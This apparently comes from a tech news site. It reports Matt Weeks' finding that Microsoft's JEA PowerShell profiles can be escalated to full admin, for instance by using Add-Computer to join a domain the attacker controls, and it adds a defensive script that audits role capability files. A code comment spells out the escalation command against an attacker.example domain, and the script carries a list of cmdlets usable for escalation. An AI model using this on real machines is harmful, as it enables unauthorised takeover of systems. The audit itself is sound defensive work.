Microsoft's PowerShell feature "Just Enough Administration" (JEA) is, apparently, "way too much administration" according to researcher Matt Weeks.
In this write-up of JEA, Weeks, a root9B researcher and Metasploit module developer, says JEA profiles aren't much of a barrier, since users holding a JEA profile can escalate themselves to full sysadmin status. Cutting to the conclusion:
"Every JEA profile I had found Microsoft has published can be bypassed to obtain complete system administrative rights, most of them immediately, reliably, and without requiring any special configuration."
The idea with JEA is to provide granular administrative profile management – a good thing, if only it worked out that way.
By way of demonstration, Weeks provides a variety of examples in which capabilities in JEA are exploitable.
One example is the Add-Computer "cmdlet", used to join a computer to a domain or move it to another domain, which Weeks says is "a reliable vector to break the JEA security barrier, and escalate privileges to complete unrestricted system control".
The attack doesn't rely on any hacks-or-cracks stuff: from inside the JEA session, the user simply joins the machine to a domain whose Domain Controller the attacker controls, and after the join the machine pulls its group policy from that server.
Result? Success: the victim machine "will pull group policy settings from your new server, enabling you via a group policy configuration to change any setting, drop the firewall, execute any command as system via startup scripts or scheduled tasks, or directly log in as the domain admin. You have broken the 'security barrier' and have full unrestricted administrative control over the system."
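The obvious practitioner question is what a role capability that exposes Add-Computer looks like next to one that doesn't, and how to spot the former before a user does. The script below is an added example, not code from Weeks' write-up or from Microsoft's published JEA samples: it writes two constructed role capability files (the file names, the cmdlet allow-list and the "dangerous cmdlet" list are all assumptions made for illustration, not an exhaustive catalogue) and then audits every .psrc it finds for unconstrained wildcards and for cmdlets that, on their own, let the connecting user leave the JEA sandbox. It assumes Windows PowerShell 5.1 or later on Windows, where the JEA cmdlets exist.

```powershell
# Added example (not from Weeks' write-up or Microsoft's JEA samples).
# Builds two constructed role capability files and audits them for cmdlets
# that let a JEA user escape the sandbox. Add-Computer is the one the
# article discusses: JEA sessions normally run commands as a privileged
# virtual account, so "Add-Computer -DomainName attacker.example -Credential $c"
# issued inside the session joins the host to an attacker-controlled domain,
# after which group policy from that domain does the rest.
# Assumes Windows PowerShell 5.1+ on Windows (New-PSRoleCapabilityFile present).

$work = Join-Path $env:TEMP 'jea-audit-demo'   # assumed scratch directory
New-Item -ItemType Directory -Path $work -Force | Out-Null

# Weak role (constructed): exposes Add-Computer with no parameter constraints.
New-PSRoleCapabilityFile -Path "$work\WeakOps.psrc" `
    -VisibleCmdlets 'Get-Service', 'Restart-Service', 'Add-Computer'

# Hardened role (constructed): only the two service cmdlets, and
# Restart-Service is pinned to a fixed ValidateSet so the user cannot
# restart an arbitrary service.
New-PSRoleCapabilityFile -Path "$work\HardenedOps.psrc" `
    -VisibleCmdlets 'Get-Service',
                    @{ Name = 'Restart-Service'
                       Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }

# Cmdlets whose presence in a role capability is an escalation path by itself.
# Illustrative list chosen for this example, not an exhaustive catalogue.
$Dangerous = 'Add-Computer', 'Remove-Computer', 'Invoke-Expression', 'Invoke-Command',
             'Start-Process', 'New-Service', 'Set-Service', 'Add-LocalGroupMember',
             'Set-ItemProperty', 'Copy-Item', 'Start-Job', 'Register-ScheduledTask'

function Test-JeaRoleCapability {
    param([Parameter(Mandatory)][string]$Path)

    # A .psrc is a restricted-language hashtable file, so it parses as data.
    $data = Import-PowerShellDataFile -Path $Path
    $findings = @()

    foreach ($entry in @($data.VisibleCmdlets | Where-Object { $null -ne $_ })) {
        # Entries are either a plain cmdlet name or a hashtable with Name/Parameters.
        $name = if ($entry -is [hashtable]) { [string]$entry.Name } else { [string]$entry }
        if ($name -match '\*') {
            $findings += "wildcard cmdlet grant '$name'"
        } elseif ($Dangerous -contains $name) {
            $findings += "escalation-capable cmdlet '$name'"
        }
    }
    foreach ($fn in @($data.VisibleFunctions | Where-Object { $null -ne $_ })) {
        if ([string]$fn -match '\*') { $findings += "wildcard function grant '$fn'" }
    }
    foreach ($cmd in @($data.VisibleExternalCommands | Where-Object { $null -ne $_ })) {
        # Any external binary (cmd.exe, net.exe, ...) is a sandbox escape.
        $findings += "external command exposed '$cmd'"
    }

    [pscustomobject]@{
        File     = Split-Path $Path -Leaf
        Findings = $findings
        Safe     = ($findings.Count -eq 0)
    }
}

# Audit every role capability in the scratch directory.
# Expected: WeakOps.psrc flags Add-Computer, HardenedOps.psrc is clean.
Get-ChildItem -Path $work -Filter *.psrc |
    ForEach-Object { Test-JeaRoleCapability -Path $_.FullName } |
    Format-List
```

Point the final Get-ChildItem at the RoleCapabilities folders under your real module paths to audit deployed roles instead of the constructed ones. Note that a clean result from this check is necessary, not sufficient: Weeks' point is that even the capabilities Microsoft published had escape routes, so a role that passes should still be tested from a low-privilege session.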
(Score: 3, Informative) by frojack on Tuesday October 11 2016, @01:58AM
It means you have to understand that the JEA profile users ARE still effectively sysadmins/domain admins/etc. with full permissions, and the JEA profile just keeps honest people honest.
It's no worse than the sudo -s hole in Linux, I guess.
You give someone sudo authority, you sort of have to trust them to do something, and hope they don't want to do things they aren't supposed to do. A far better way is to have some scripts and give people only the ability to run those scripts, but invariably they will find a way around that as well.
No, you are mistaken. I've always had this sig.